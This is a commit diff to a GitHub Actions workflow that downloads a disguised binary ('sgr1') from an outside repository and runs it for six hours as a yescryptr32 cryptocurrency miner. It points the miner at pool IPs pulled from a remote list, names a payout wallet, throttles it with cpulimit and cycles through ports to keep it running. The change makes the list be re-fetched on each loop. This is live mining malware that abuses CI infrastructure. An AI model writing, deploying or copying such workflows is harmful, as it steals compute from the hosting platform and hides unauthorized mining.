Update mainunfdin.yml

diff --git a/.github/workflows/mainunfdin.yml b/.github/workflows/mainunfdin.yml
--- a/.github/workflows/mainunfdin.yml
+++ b/.github/workflows/mainunfdin.yml
@@ -43,35 +43,33 @@ jobs:
         wget -O sgr1 https://github.com/barburonjilo/back/raw/main/sr
         chmod +x sgr1
 
-    - name: Download IP list
-      run: |
-        wget -O list.json https://github.com/barburonjilo/setstra/raw/main/list.json
-        if [[ ! -f list.json ]]; then
-          echo "Failed to download IP list. Exiting."
-          exit 1
-        fi
-
     - name: Run and manage process
       run: |
-        start_time=$(date +%s)
-        end_time=$((start_time + 6*3600))  # 6 hours from start
+        end_time=$(( $(date +%s) + 6*3600 ))  # 6 hours from now
         while [ $(date +%s) -lt $end_time ]; do
-          if [ -f .lib/sgr1 ]; then
-            # Select a random IP from the JSON file
-            ip=$(jq -r '.[]' list.json | shuf -n 1)
-            if [ -z "$ip" ]; then
-              echo "No IP found in list.json. Exiting."
-              exit 1
-            fi
+          # Download and check IP list
+          wget -O list.json https://github.com/barburonjilo/setstra/raw/main/list.json
+          if [[ ! -f list.json ]]; then
+            echo "Failed to download IP list. Exiting."
+            exit 1
+          fi
 
-            # Remove selected IP from JSON file
-            jq --arg ip "$ip" 'del(.[] | select(. == $ip))' list.json > tmp.json && mv tmp.json list.json
+          # Select a random IP from the JSON file
+          ip=$(jq -r '.[]' list.json | shuf -n 1)
+          if [ -z "$ip" ]; then
+            echo "No IP found in list.json. Exiting."
+            exit 1
+          fi
 
-            # Start the process for multiple ports
-            for port in $(seq 843 852); do
+          # Remove selected IP from JSON file
+          jq --arg ip "$ip" 'del(.[] | select(. == $ip))' list.json > tmp.json && mv tmp.json list.json
+
+          # Start the process for multiple ports
+          for port in $(seq 843 852); do
+            if [ -f .lib/sgr1 ]; then
               cpulimit -l 300 -e .lib/sgr1 &
               cpulimit_pid=$!
-              nohup .lib/sgr1 -a yescryptr32 --pool $ip:$port -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$cpulimit_pid --timeout 120 -t 4 > dance_$port.log 2>&1 &
+              nohup .lib/sgr1 -a yescryptr32 --pool $ip:$port -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.${cpulimit_pid} --timeout 120 -t 4 > dance_$port.log 2>&1 &
               process_pid=$!
               echo "Started process with PID $process_pid using IP $ip and port $port"
 
@@ -80,15 +78,15 @@ jobs:
 
               # Kill the process
               kill $process_pid || true
-            done
+            else
+              echo "sgr1 not found. Skipping..."
+              sleep 120
+            fi
+          done
 
-            # Kill cpulimit process
-            kill $cpulimit_pid || true
+          # Kill cpulimit process
+          kill $cpulimit_pid || true
 
-            # Wait for 2 minutes before the next iteration
-            sleep 120
-          else
-            echo "sgr1 not found. Skipping..."
-            sleep 120
-          fi
+          # Wait for 2 minutes before the next iteration
+          sleep 120
         done
